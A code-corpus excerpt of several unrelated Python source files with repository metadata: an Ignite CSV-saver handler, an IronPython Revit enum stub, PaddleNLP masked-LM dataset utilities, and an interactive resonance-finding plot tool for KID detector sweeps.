output_dir: str = "./",
filename: str = "predictions.csv",
overwrite: bool = True,
batch_transform: Callable = lambda x: x,
output_transform: Callable = lambda x: x,
name: Optional[str] = None,
) -> None:
"""
Args:
output_dir: output CSV file directory.
filename: name of the saved CSV file name.
overwrite: whether to overwriting existing CSV file content. If we are not overwriting,
then we check if the results have been previously saved, and load them to the prediction_dict.
batch_transform: a callable that is used to transform the
ignite.engine.batch into expected format to extract the meta_data dictionary.
output_transform: a callable that is used to transform the
ignite.engine.output into the form expected model prediction data.
The first dimension of this transform's output will be treated as the
batch dimension. Each item in the batch will be saved individually.
name: identifier of logging.logger to use, defaulting to `engine.logger`.
"""
self.saver = CSVSaver(output_dir, filename, overwrite)
self.batch_transform = batch_transform
self.output_transform = output_transform
self.logger = logging.getLogger(name)
self._name = name
def attach(self, engine: Engine) -> None:
"""
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if self._name is None:
self.logger = engine.logger
if not engine.has_event_handler(self, Events.ITERATION_COMPLETED):
engine.add_event_handler(Events.ITERATION_COMPLETED, self)
if not engine.has_event_handler(self.saver.finalize, Events.COMPLETED):
engine.add_event_handler(Events.COMPLETED, lambda engine: self.saver.finalize())
def __call__(self, engine: Engine) -> None:
"""
This method assumes self.batch_transform will extract metadata from the input batch.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
meta_data = self.batch_transform(engine.state.batch)
engine_output = self.output_transform(engine.state.output)
self.saver.save_batch(engine_output, meta_data)
| 43
| 110
| 0.680863
|
6f4596a91b7cf14aed7afbaf0f821f8a0848dd26
| 1,100
|
py
|
Python
|
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/BentFabricWiresOrientation.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/BentFabricWiresOrientation.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/BentFabricWiresOrientation.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
class BentFabricWiresOrientation(Enum, IComparable, IFormattable, IConvertible):
"""
Bent Fabric wires orientation.
enum BentFabricWiresOrientation,values: Down (0),Up (1)
"""
def __eq__(self, *args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self, *args):
pass
def __gt__(self, *args):
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args):
pass
def __lt__(self, *args):
pass
def __ne__(self, *args):
pass
def __reduce_ex__(self, *args):
pass
def __str__(self, *args):
pass
Down = None
Up = None
value__ = None
| 23.913043
| 221
| 0.566364
|
b9b6b0ef084d754f6d29a03cd11c16ae3e033395
| 29,054
|
py
|
Python
|
applications/neural_search/recall/domain_adaptive_pretraining/data_tools/dataset_utils.py
|
SunYanCN/PaddleNLP
|
31deea6c989f399b4552ee711d9f7d62768d645f
|
[
"Apache-2.0"
] | null | null | null |
applications/neural_search/recall/domain_adaptive_pretraining/data_tools/dataset_utils.py
|
SunYanCN/PaddleNLP
|
31deea6c989f399b4552ee711d9f7d62768d645f
|
[
"Apache-2.0"
] | null | null | null |
applications/neural_search/recall/domain_adaptive_pretraining/data_tools/dataset_utils.py
|
SunYanCN/PaddleNLP
|
31deea6c989f399b4552ee711d9f7d62768d645f
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors, and NVIDIA, and PaddlePaddle Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Most of the code here has been copied from:
# https://github.com/google-research/albert/blob/master/create_pretraining_data.py
# with some modifications.
import math
import os
import re
import time
import collections
import numpy as np
import paddle
import paddle.distributed.fleet as fleet
print_rank_0 = print
#from megatron.data.indexed_dataset import make_dataset as make_indexed_dataset
COMPILED = False
DSET_TYPE_BERT = 'standard_bert'
DSET_TYPE_T5 = 't5'
DSET_TYPE_ERNIE = 'ernie'
DSET_TYPES = [DSET_TYPE_BERT, DSET_TYPE_T5, DSET_TYPE_ERNIE]
class MMapIndexedDataset(paddle.io.Dataset):
def __init__(self, path, skip_warmup=False):
super().__init__()
self._path = path
# All documment ids, extend as 1-D array.
for suffix in ["_ids.npy", "_idx.npz"]:
if not os.path.isfile(path + suffix):
raise ValueError("File Not found, %s" % (path + suffix))
self._token_ids = np.load(
path + "_ids.npy", mmap_mode="r", allow_pickle=True)
process_data = np.load(path + "_idx.npz")
self._sizes = process_data["lens"]
self._pointers = process_data["sents"]
self._doc_idx = process_data["docs"]
def __getstate__(self):
return self._path
def __len__(self):
return len(self._sizes)
# @lru_cache(maxsize=8)
def __getitem__(self, idx):
if isinstance(idx, int):
size = self._sizes[idx]
ptr = self._pointers[idx]
np_array = self._token_ids[ptr:ptr + size]
return np_array
elif isinstance(idx, slice):
start, stop, step = idx.indices(len(self))
if step != 1:
raise ValueError(
"Slices into indexed_dataset must be contiguous")
ptr = self._pointers[start]
sizes = self._sizes[idx]
offsets = list(accumulate(sizes))
total_size = sum(sizes)
np_array = self._token_ids[ptr:ptr + total_size]
sents = np.split(np_array, offsets[:-1])
return sents
def get(self, idx, offset=0, length=None):
""" Retrieves a single item from the dataset with the option to only
return a portion of the item.
get(idx) is the same as [idx] but get() does not support slicing.
"""
size = self._sizes[idx]
ptr = self._pointers[idx]
if length is None:
length = size - offset
ptr += offset
np_array = self._token_ids[ptr:prt + length]
return np_array
@property
def sizes(self):
return self._sizes
@property
def doc_idx(self):
return self._doc_idx
def get_doc_idx(self):
return self._doc_idx
def set_doc_idx(self, doc_idx_):
self._doc_idx = doc_idx_
def make_indexed_dataset(data_prefix, data_impl=None, skip_warmup=False):
return MMapIndexedDataset(data_prefix)
def compile_helper():
"""Compile helper function ar runtime. Make sure this
is invoked on a single process."""
import os
import subprocess
path = os.path.abspath(os.path.dirname(__file__))
ret = subprocess.run(['make', '-C', path])
if ret.returncode != 0:
print("Making C++ dataset helpers module failed, exiting.")
import sys
sys.exit(1)
def get_a_and_b_segments(sample, np_rng):
"""Divide sample into a and b segments."""
# Number of sentences in the sample.
n_sentences = len(sample)
# Make sure we always have two sentences.
assert n_sentences > 1, 'make sure each sample has at least two sentences.'
# First part:
# `a_end` is how many sentences go into the `A`.
a_end = 1
if n_sentences >= 3:
# Note that randin in numpy is exclusive.
a_end = np_rng.randint(1, n_sentences)
tokens_a = []
for j in range(a_end):
tokens_a.extend(sample[j])
# Second part:
tokens_b = []
for j in range(a_end, n_sentences):
tokens_b.extend(sample[j])
# Random next:
is_next_random = False
if np_rng.random() < 0.5:
is_next_random = True
tokens_a, tokens_b = tokens_b, tokens_a
return tokens_a, tokens_b, is_next_random
def truncate_segments(tokens_a, tokens_b, len_a, len_b, max_num_tokens, np_rng):
"""Truncates a pair of sequences to a maximum sequence length."""
#print(len_a, len_b, max_num_tokens)
assert len_a > 0
if len_a + len_b <= max_num_tokens:
return False
while len_a + len_b > max_num_tokens:
if len_a > len_b:
len_a -= 1
tokens = tokens_a
else:
len_b -= 1
tokens = tokens_b
if np_rng.random() < 0.5:
del tokens[0]
else:
tokens.pop()
return True
def create_tokens_and_tokentypes(tokens_a, tokens_b, cls_id, sep_id):
"""Merge segments A and B, add [CLS] and [SEP] and build tokentypes."""
tokens = []
tokentypes = []
# [CLS].
tokens.append(cls_id)
tokentypes.append(0)
# Segment A.
for token in tokens_a:
tokens.append(token)
tokentypes.append(0)
# [SEP].
tokens.append(sep_id)
tokentypes.append(0)
# Segment B.
for token in tokens_b:
tokens.append(token)
tokentypes.append(1)
if tokens_b:
# [SEP].
tokens.append(sep_id)
tokentypes.append(1)
return tokens, tokentypes
MaskedLmInstance = collections.namedtuple("MaskedLmInstance",
["index", "label"])
def is_start_piece(piece):
"""Check if the current word piece is the starting piece (BERT)."""
# When a word has been split into
# WordPieces, the first token does not have any marker and any subsequence
# tokens are prefixed with ##. So whenever we see the ## token, we
# append it to the previous set of word indexes.
return not piece.startswith("##")
def create_masked_lm_predictions(tokens,
vocab_id_list,
vocab_id_to_token_dict,
masked_lm_prob,
cls_id,
sep_id,
mask_id,
max_predictions_per_seq,
np_rng,
max_ngrams=3,
vocab_token_to_id_dict=None,
do_whole_word_mask=True,
favor_longer_ngram=False,
do_permutation=False,
geometric_dist=False,
to_chinese_char=False,
inplace_random_mask=False,
masking_style="bert"):
"""Creates the predictions for the masked LM objective.
Note: Tokens here are vocab ids and not text tokens."""
cand_indexes = []
# Note(mingdachen): We create a list for recording if the piece is
# the starting piece of current token, where 1 means true, so that
# on-the-fly whole word masking is possible.
token_boundary = [0] * len(tokens)
for (i, token) in enumerate(tokens):
if token == cls_id or token == sep_id:
token_boundary[i] = 1
continue
# Whole Word Masking means that if we mask all of the wordpieces
# corresponding to an original word.
#
# Note that Whole Word Masking does *not* change the training code
# at all -- we still predict each WordPiece independently, softmaxed
# over the entire vocabulary.
vocab_id = vocab_id_to_token_dict[token]
if (do_whole_word_mask and len(cand_indexes) >= 1 and
not is_start_piece(vocab_id)):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
if is_start_piece(vocab_id_to_token_dict[token]):
token_boundary[i] = 1
if to_chinese_char:
char_tokens = []
assert vocab_token_to_id_dict is not None
for i, b in enumerate(token_boundary):
if b == 0:
vocab_id = vocab_id_to_token_dict[tokens[i]]
new_vocab_id = vocab_id[2:] if len(
re.findall('##[\u4E00-\u9FA5]', vocab_id)) > 0 else vocab_id
char_tokens.append(vocab_token_to_id_dict[new_vocab_id]
if new_vocab_id in vocab_token_to_id_dict
else token)
else:
char_tokens.append(tokens[i])
output_tokens = list(char_tokens)
else:
output_tokens = list(tokens)
masked_lm_positions = []
masked_lm_labels = []
if masked_lm_prob == 0:
return (output_tokens, masked_lm_positions, masked_lm_labels,
token_boundary)
num_to_predict = min(max_predictions_per_seq,
max(1, int(round(len(tokens) * masked_lm_prob))))
ngrams = np.arange(1, max_ngrams + 1, dtype=np.int64)
if not geometric_dist:
# Note(mingdachen):
# By default, we set the probilities to favor shorter ngram sequences.
pvals = 1. / np.arange(1, max_ngrams + 1)
pvals /= pvals.sum(keepdims=True)
if favor_longer_ngram:
pvals = pvals[::-1]
ngram_indexes = []
for idx in range(len(cand_indexes)):
ngram_index = []
for n in ngrams:
ngram_index.append(cand_indexes[idx:idx + n])
ngram_indexes.append(ngram_index)
np_rng.shuffle(ngram_indexes)
(masked_lms, masked_spans) = ([], [])
covered_indexes = set()
backup_output_tokens = list(output_tokens)
for cand_index_set in ngram_indexes:
if len(masked_lms) >= num_to_predict:
break
if not cand_index_set:
continue
# Note(mingdachen):
# Skip current piece if they are covered in lm masking or previous ngrams.
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes:
continue
if not geometric_dist:
n = np_rng.choice(
ngrams[:len(cand_index_set)],
p=pvals[:len(cand_index_set)] /
pvals[:len(cand_index_set)].sum(keepdims=True))
else:
# Sampling "n" from the geometric distribution and clipping it to
# the max_ngrams. Using p=0.2 default from the SpanBERT paper
# https://arxiv.org/pdf/1907.10529.pdf (Sec 3.1)
n = min(np_rng.geometric(0.2), max_ngrams)
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# Note(mingdachen):
# Repeatedly looking for a candidate that does not exceed the
# maximum number of predictions by trying shorter ngrams.
while len(masked_lms) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
masked_token = None
if masking_style == "bert":
# 80% of the time, replace with [MASK]
if np_rng.random() < 0.8:
masked_token = mask_id
else:
# 10% of the time, keep original
if np_rng.random() < 0.5:
masked_token = output_tokens[index]
# 10% of the time, replace with random word
else:
if inplace_random_mask:
masked_token = backup_output_tokens[np_rng.randint(
0, len(output_tokens))]
else:
masked_token = vocab_id_list[np_rng.randint(
0, len(vocab_id_list))]
elif masking_style == "t5":
masked_token = mask_id
else:
raise ValueError("invalid value of masking style")
output_tokens[index] = masked_token
masked_lms.append(
MaskedLmInstance(
index=index, label=tokens[index]))
masked_spans.append(
MaskedLmInstance(
index=index_set, label=[tokens[index] for index in index_set]))
assert len(masked_lms) <= num_to_predict
np_rng.shuffle(ngram_indexes)
select_indexes = set()
if do_permutation:
for cand_index_set in ngram_indexes:
if len(select_indexes) >= num_to_predict:
break
if not cand_index_set:
continue
# Note(mingdachen):
# Skip current piece if they are covered in lm masking or previous ngrams.
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes or index in select_indexes:
continue
n = np.random.choice(
ngrams[:len(cand_index_set)],
p=pvals[:len(cand_index_set)] /
pvals[:len(cand_index_set)].sum(keepdims=True))
index_set = sum(cand_index_set[n - 1], [])
n -= 1
while len(select_indexes) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(select_indexes) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes or index in select_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
select_indexes.add(index)
assert len(select_indexes) <= num_to_predict
select_indexes = sorted(select_indexes)
permute_indexes = list(select_indexes)
np_rng.shuffle(permute_indexes)
orig_token = list(output_tokens)
for src_i, tgt_i in zip(select_indexes, permute_indexes):
output_tokens[src_i] = orig_token[tgt_i]
masked_lms.append(
MaskedLmInstance(
index=src_i, label=orig_token[src_i]))
masked_lms = sorted(masked_lms, key=lambda x: x.index)
# Sort the spans by the index of the first span
masked_spans = sorted(masked_spans, key=lambda x: x.index[0])
for p in masked_lms:
masked_lm_positions.append(p.index)
masked_lm_labels.append(p.label)
return (output_tokens, masked_lm_positions, masked_lm_labels,
token_boundary, masked_spans)
def pad_and_convert_to_numpy(tokens, tokentypes, masked_positions,
masked_labels, pad_id, max_seq_length):
"""Pad sequences and convert them to numpy."""
# Some checks.
num_tokens = len(tokens)
padding_length = max_seq_length - num_tokens
assert padding_length >= 0
assert len(tokentypes) == num_tokens
assert len(masked_positions) == len(masked_labels)
# Tokens and token types.
filler = [pad_id] * padding_length
tokens_np = np.array(tokens + filler, dtype=np.int64)
tokentypes_np = np.array(tokentypes + filler, dtype=np.int64)
# Padding mask.
padding_mask_np = np.array(
[1] * num_tokens + [0] * padding_length, dtype=np.int64)
# Lables and loss mask.
labels = [-1] * max_seq_length
loss_mask = [0] * max_seq_length
for i in range(len(masked_positions)):
assert masked_positions[i] < num_tokens
labels[masked_positions[i]] = masked_labels[i]
loss_mask[masked_positions[i]] = 1
labels_np = np.array(labels, dtype=np.int64)
loss_mask_np = np.array(loss_mask, dtype=np.int64)
return tokens_np, tokentypes_np, labels_np, padding_mask_np, loss_mask_np
def build_train_valid_test_datasets(data_prefix,
args,
tokenizer,
splits_string,
train_valid_test_num_samples,
max_seq_length,
masked_lm_prob,
short_seq_prob,
seed,
skip_warmup,
binary_head=False,
max_seq_length_dec=None,
dataset_type='standard_bert'):
if len(data_prefix) == 1:
return _build_train_valid_test_datasets(
data_prefix[0],
args,
tokenizer,
splits_string,
train_valid_test_num_samples,
max_seq_length,
masked_lm_prob,
short_seq_prob,
seed,
skip_warmup,
binary_head,
max_seq_length_dec,
dataset_type=dataset_type)
def _build_train_valid_test_datasets(data_prefix,
args,
tokenizer,
splits_string,
train_valid_test_num_samples,
max_seq_length,
masked_lm_prob,
short_seq_prob,
seed,
skip_warmup,
binary_head,
max_seq_length_dec,
dataset_type='standard_bert'):
if dataset_type not in DSET_TYPES:
raise ValueError("Invalid dataset_type: ", dataset_type)
# Indexed dataset.
indexed_dataset = get_indexed_dataset_(data_prefix, None, skip_warmup)
# Get start and end indices of train/valid/train into doc-idx
# Note that doc-idx is desinged to be num-docs + 1 so we can
# easily iterate over it.
total_num_of_documents = indexed_dataset.doc_idx.shape[0] - 1
splits = get_train_valid_test_split_(splits_string, total_num_of_documents)
print(splits)
# Print stats about the splits.
print_rank_0(' > dataset split:')
def print_split_stats(name, index):
print_rank_0(' {}:'.format(name))
print_rank_0(' document indices in [{}, {}) total of {} '
'documents'.format(splits[index], splits[index + 1],
splits[index + 1] - splits[index]))
start_index = indexed_dataset.doc_idx[splits[index]]
end_index = indexed_dataset.doc_idx[splits[index + 1]]
print_rank_0(' sentence indices in [{}, {}) total of {} '
'sentences'.format(start_index, end_index, end_index -
start_index))
print_split_stats('train', 0)
print_split_stats('validation', 1)
print_split_stats('test', 2)
def build_dataset(index, name):
# from megatron.data.bert_dataset import BertDataset
# from megatron.data.t5_dataset import T5Dataset
from .ernie_dataset import ErnieDataset
dataset = None
if splits[index + 1] > splits[index]:
# Get the pointer to the original doc-idx so we can set it later.
doc_idx_ptr = indexed_dataset.get_doc_idx()
# Slice the doc-idx
start_index = splits[index]
# Add +1 so we can index into the dataset to get the upper bound.
end_index = splits[index + 1] + 1
# New doc_idx view.
indexed_dataset.set_doc_idx(doc_idx_ptr[start_index:end_index])
# Build the dataset accordingly.
kwargs = dict(
name=name,
data_prefix=data_prefix,
num_epochs=None,
max_num_samples=train_valid_test_num_samples[index],
max_seq_length=max_seq_length,
seed=seed,
share_folder=args.share_folder, )
if dataset_type == DSET_TYPE_T5:
dataset = T5Dataset(
indexed_dataset=indexed_dataset,
tokenizer=tokenizer,
masked_lm_prob=masked_lm_prob,
max_seq_length_dec=max_seq_length_dec,
short_seq_prob=short_seq_prob,
**kwargs)
elif dataset_type == DSET_TYPE_BERT:
dataset = BertDataset(
indexed_dataset=indexed_dataset,
tokenizer=tokenizer,
masked_lm_prob=masked_lm_prob,
short_seq_prob=short_seq_prob,
binary_head=binary_head,
**kwargs)
elif dataset_type == DSET_TYPE_ERNIE:
dataset = ErnieDataset(
indexed_dataset=indexed_dataset,
tokenizer=tokenizer, #ErnieTokenizer.from_pretrained("ernie-1.0"),
masked_lm_prob=masked_lm_prob,
short_seq_prob=short_seq_prob,
binary_head=binary_head,
**kwargs)
else:
raise NotImplementedError("Dataset type not fully implemented.")
# Set the original pointer so dataset remains the main dataset.
indexed_dataset.set_doc_idx(doc_idx_ptr)
# Checks.
assert indexed_dataset.doc_idx[0] == 0
assert indexed_dataset.doc_idx.shape[0] == \
(total_num_of_documents + 1)
return dataset
train_dataset = build_dataset(0, 'train')
valid_dataset = build_dataset(1, 'valid')
test_dataset = build_dataset(2, 'test')
return (train_dataset, valid_dataset, test_dataset)
def get_indexed_dataset_(data_prefix, data_impl, skip_warmup):
print_rank_0(' > building dataset index ...')
start_time = time.time()
indexed_dataset = make_indexed_dataset(data_prefix, data_impl, skip_warmup)
assert indexed_dataset.sizes.shape[0] == indexed_dataset.doc_idx[-1]
print_rank_0(' > finished creating indexed dataset in {:4f} '
'seconds'.format(time.time() - start_time))
print_rank_0(' > indexed dataset stats:')
print_rank_0(' number of documents: {}'.format(
indexed_dataset.doc_idx.shape[0] - 1))
print_rank_0(' number of sentences: {}'.format(
indexed_dataset.sizes.shape[0]))
return indexed_dataset
def get_train_valid_test_split_(splits_string, size):
""" Get dataset splits from comma or '/' separated string list."""
print(splits_string)
splits = []
if splits_string.find(',') != -1:
splits = [float(s) for s in splits_string.split(',')]
elif splits_string.find('/') != -1:
splits = [float(s) for s in splits_string.split('/')]
else:
splits = [float(splits_string)]
while len(splits) < 3:
splits.append(0.)
splits = splits[:3]
splits_sum = sum(splits)
assert splits_sum > 0.0
splits = [split / splits_sum for split in splits]
splits_index = [0]
for index, split in enumerate(splits):
splits_index.append(splits_index[index] + int(
round(split * float(size))))
diff = splits_index[-1] - size
for index in range(1, len(splits_index)):
splits_index[index] -= diff
assert len(splits_index) == 4
assert splits_index[-1] == size
return splits_index
def get_samples_mapping(indexed_dataset, data_prefix, num_epochs,
max_num_samples, max_seq_length, short_seq_prob, seed,
name, binary_head, share_folder):
"""Get a list that maps a sample index to a starting sentence index, end sentence index, and length"""
if not num_epochs:
if not max_num_samples:
raise ValueError("Need to specify either max_num_samples "
"or num_epochs")
num_epochs = np.iinfo(np.int32).max - 1
if not max_num_samples:
max_num_samples = np.iinfo(np.int64).max - 1
# Filename of the index mapping
indexmap_filename = data_prefix
indexmap_filename += '_{}_indexmap'.format(name)
if num_epochs != (np.iinfo(np.int32).max - 1):
indexmap_filename += '_{}ep'.format(num_epochs)
if max_num_samples != (np.iinfo(np.int64).max - 1):
indexmap_filename += '_{}mns'.format(max_num_samples)
indexmap_filename += '_{}msl'.format(max_seq_length)
indexmap_filename += '_{:0.2f}ssp'.format(short_seq_prob)
indexmap_filename += '_{}s'.format(seed)
indexmap_filename += '.npy'
local_rank = 0 if fleet.local_rank() is None else int(fleet.local_rank())
if share_folder:
local_rank = fleet.worker_index()
# Build the indexed mapping if not exist.
if local_rank == 0 and \
not os.path.isfile(indexmap_filename):
print(' > WARNING: could not find index map file {}, building '
'the indices on rank 0 ...'.format(indexmap_filename))
# Make sure the types match the helpers input types.
assert indexed_dataset.doc_idx.dtype == np.int64
print(indexed_dataset.sizes.dtype)
assert indexed_dataset.sizes.dtype == np.int32
# Build samples mapping
verbose = local_rank == 0
start_time = time.time()
print_rank_0(' > building sapmles index mapping for {} ...'.format(
name))
# First compile and then import.
if local_rank == 0:
compile_helper()
import data_tools.helpers as helpers
samples_mapping = helpers.build_mapping(
indexed_dataset.doc_idx, indexed_dataset.sizes, num_epochs,
max_num_samples, max_seq_length, short_seq_prob, seed, verbose, 2
if binary_head else 1)
print_rank_0(' > done building sapmles index maping')
np.save(indexmap_filename, samples_mapping, allow_pickle=True)
print_rank_0(' > saved the index mapping in {}'.format(
indexmap_filename))
# Make sure all the ranks have built the mapping
print_rank_0(' > elasped time to build and save samples mapping '
'(seconds): {:4f}'.format(time.time() - start_time))
else:
while True:
if (not os.path.isfile(indexmap_filename)):
time.sleep(3)
else:
try:
np.load(indexmap_filename, allow_pickle=True, mmap_mode='r')
break
except Exception as e:
print(
"%s file is still writing or damaged, please wait a moment."
% indexmap_filename)
time.sleep(3)
# This should be a barrier but nccl barrier assumes
# device_index=rank which is not the case for model
# parallel case
if paddle.distributed.get_world_size() > 1:
if paddle.in_dynamic_mode():
paddle.distributed.barrier()
# Load indexed dataset.
print_rank_0(' > loading indexed mapping from {}'.format(indexmap_filename))
start_time = time.time()
samples_mapping = np.load(
indexmap_filename, allow_pickle=True, mmap_mode='r')
print_rank_0(' loaded indexed file in {:3.3f} seconds'.format(time.time(
) - start_time))
print_rank_0(' total number of samples: {}'.format(samples_mapping.shape[
0]))
return samples_mapping
| 37.440722
| 106
| 0.583018
|
03572a7ca0e4bb0341be7c974b2c11603a11182f
| 33,774
|
py
|
Python
|
submm_python_routines/KIDs/find_resonances_interactive.py
|
chw3k5/WaferScreen
|
c0ca7fe939fe7cd0b722b7d6129b148c03a7505c
|
[
"Apache-2.0"
] | 1
|
2021-07-30T19:06:07.000Z
|
2021-07-30T19:06:07.000Z
|
submm_python_routines/KIDs/find_resonances_interactive.py
|
chw3k5/WaferScreen
|
c0ca7fe939fe7cd0b722b7d6129b148c03a7505c
|
[
"Apache-2.0"
] | 8
|
2021-04-22T20:47:48.000Z
|
2021-07-30T19:06:01.000Z
|
submm_python_routines/KIDs/find_resonances_interactive.py
|
chw3k5/WaferScreen
|
c0ca7fe939fe7cd0b722b7d6129b148c03a7505c
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import os
import sys
from scipy import signal, fftpack
import platform
from submm_python_routines.KIDs import resonance_fitting as rf
from matplotlib.backends.backend_pdf import PdfPages
from typing import NamedTuple
"""
Standalone version of kidPy's find_KIDs_interactive
use fin
If you have already identified most of the resonators at indexes kid_idx
just call the interactive plot object like so
ip = InteractivePlot(f,20*np.log10(np.abs(z)),kid_idx)
if you want to use use the filtering and threshold resonator finder
call find_vna_sweep(f,z) like
ip = find_vna_sweep(f,z)
get the kid indexes out from ip.kid_idx
get the frequencies out from f[ip.kid_idx]
"""
def open_stored_sweep(savepath,load_std = False):
"""Opens sweep data
inputs:
char savepath: The absolute path where sweep data is saved
ouputs:
numpy array Is: The I values
numpy array Qs: The Q values"""
files = sorted(os.listdir(savepath))
I_list, Q_list, stdI_list, stdQ_list = [], [], [], []
for filename in files:
if filename.startswith('I'):
I_list.append(os.path.join(savepath, filename))
if filename.startswith('Q'):
Q_list.append(os.path.join(savepath, filename))
if filename.startswith('stdI'):
stdI_list.append(os.path.join(savepath, filename))
if filename.startswith('stdQ'):
stdQ_list.append(os.path.join(savepath, filename))
Is = np.array([np.load(filename) for filename in I_list])
Qs = np.array([np.load(filename) for filename in Q_list])
if len(stdI_list) >0:
std_Is = np.array([np.load(filename) for filename in stdI_list])
std_Qs = np.array([np.load(filename) for filename in stdQ_list])
if load_std:
return Is, Qs, std_Is, std_Qs
else:
return Is, Qs
class SingleWindow(NamedTuple):
left_max: int
left_fitter_pad: int
left_pad: int
left_window: int
minima: int
right_window: int
right_pad: int
right_fitter_pad: int
right_max: int
class InteractivePlot(object):
"""
Convention is to supply the data in magnitude units i.e. 20*np.log10(np.abs(z))
"""
def __init__(self, chan_freqs, data, kid_idx, f_old=None, data_old=None, kid_idx_old=None):
plt.rcParams['keymap.forward'] = ['v']
plt.rcParams['keymap.back'] = ['c', 'backspace'] # remove arrows from back and forward on plot
self.chan_freqs = chan_freqs
self.data = data
self.f_old = f_old
self.data_old = data_old
self.kid_idx_old = kid_idx_old
self.kid_idx = kid_idx
self.lim_shift_factor = 0.2
self.zoom_factor = 0.1 # no greater than 0.5
self.kid_idx_len = len(kid_idx)
self.fig = plt.figure(1000, figsize=(16, 6))
self.ax = self.fig.add_subplot(111)
self.fig.canvas.mpl_connect('key_press_event', self.on_key_press)
self.fig.canvas.mpl_connect('key_release_event', self.on_key_release)
self.fig.canvas.mpl_connect('button_press_event', self.onClick)
self.l1, = self.ax.plot(self.chan_freqs, self.data)
self.p1, = self.ax.plot(self.chan_freqs[self.kid_idx], self.data[self.kid_idx], "r*", markersize=8)
self.text_dict = {}
for i in range(0, len(self.kid_idx)):
self.text_dict[i] = plt.text(self.chan_freqs[self.kid_idx][i], self.data[self.kid_idx][i], str(i))
if isinstance(self.f_old, np.ndarray):
self.l2, = self.ax.plot(self.f_old, self.data_old, color="C0", alpha=0.25)
self.p2, = self.ax.plot(self.f_old[self.kid_idx_old], self.data_old[self.kid_idx_old], "r*", markersize=8,
alpha=0.1)
self.text_dict_old = {}
for i in range(0, len(self.kid_idx_old)):
self.text_dict_old[i] = plt.text(self.f_old[self.kid_idx_old][i], self.data_old[self.kid_idx_old][i],
str(i), color='Grey')
self.shift_is_held = False
self.control_is_held = False
self.add_list = []
self.delete_list = []
if platform.system() == 'Darwin':
print("please hold either the a or d key \n while right clicking to add or delete points")
else:
print("please hold either the shift or control key \n while right clicking to add or remove points")
print("You can use the arrow keys to pan around")
print("You can use z and x keys to zoom in and out")
print("close all plots when finished")
plt.xlabel('frequency (MHz)')
plt.ylabel('dB')
plt.show(block=True)
def on_key_press(self, event):
# mac or windows
if platform.system().lower() == 'darwin':
if event.key == 'a':
self.shift_is_held = True
if event.key == 'd':
self.control_is_held = True
else:
if event.key == 'shift':
self.shift_is_held = True
if event.key == 'control':
self.control_is_held = True
if event.key == 'right': # pan right
xlim_left, xlim_right = self.ax.get_xlim()
xlim_size = xlim_right - xlim_left
self.ax.set_xlim(xlim_left + self.lim_shift_factor * xlim_size,
xlim_right + self.lim_shift_factor * xlim_size)
plt.draw()
if event.key == 'left': # pan left
xlim_left, xlim_right = self.ax.get_xlim()
xlim_size = xlim_right - xlim_left
self.ax.set_xlim(xlim_left - self.lim_shift_factor * xlim_size,
xlim_right - self.lim_shift_factor * xlim_size)
plt.draw()
if event.key == 'up': # pan up
ylim_left, ylim_right = self.ax.get_ylim()
ylim_size = ylim_right - ylim_left
self.ax.set_ylim(ylim_left + self.lim_shift_factor * ylim_size,
ylim_right + self.lim_shift_factor * ylim_size)
plt.draw()
if event.key == 'down': # pan down
ylim_left, ylim_right = self.ax.get_ylim()
ylim_size = ylim_right - ylim_left
self.ax.set_ylim(ylim_left - self.lim_shift_factor * ylim_size,
ylim_right - self.lim_shift_factor * ylim_size)
plt.draw()
if event.key == 'z': # zoom in
xlim_left, xlim_right = self.ax.get_xlim()
ylim_left, ylim_right = self.ax.get_ylim()
xlim_size = xlim_right - xlim_left
ylim_size = ylim_right - ylim_left
self.ax.set_xlim(xlim_left + self.zoom_factor * xlim_size, xlim_right - self.zoom_factor * xlim_size)
self.ax.set_ylim(ylim_left + self.zoom_factor * ylim_size, ylim_right - self.zoom_factor * ylim_size)
plt.draw()
if event.key == 'x': # zoom out
xlim_left, xlim_right = self.ax.get_xlim()
ylim_left, ylim_right = self.ax.get_ylim()
